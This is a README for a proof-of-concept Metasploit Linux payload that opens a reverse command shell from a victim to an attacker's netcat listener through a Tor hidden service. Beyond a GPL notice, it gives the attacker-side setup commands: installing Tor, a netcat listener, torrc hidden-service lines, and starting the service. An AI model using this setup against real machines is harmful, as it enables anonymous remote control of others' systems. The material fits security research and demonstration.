A simple PoC of a Linux payload that gets connected to a listening netcat via Tor and lets the attacker run commands in the target machine.
This is free software, and you are welcome to redistribute it under certain conditions.
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
For more details on this issue, check the COPYING file.
Although this software is a PoC, this can be easily run as a local plugin by copying the ruby files in their corresponding metasploit data directory.
Assuming that the victim is already running Tor, to set the environment an attacker would have to:
- Install tor in the attacker machine. E. g., in Debian-like systems:
sudo apt-get install tor
- Set up a listening netcat locally in the machine.
nc -v -l -p 1234 127.0.0.1
- Configuring the listening netcat to be reachable via Tor by updating the torrc file:
HiddenServiceDir /var/lib/tor/nc_hidden_service/ HiddenServicePort 1234 127.0.0.1:1234
- Start the Tor service in the attacker's machine and get the hostname stored in the HiddenServiceDir set before:
service tor start
- Prepare the payload accordingly.
Note that the full scenario will imply the installation/compilation of Tor in the victim. Similar scenarios can be deployed using other services such as SSH or Meterpreter. More detailed information can be found in the Eleven Paths.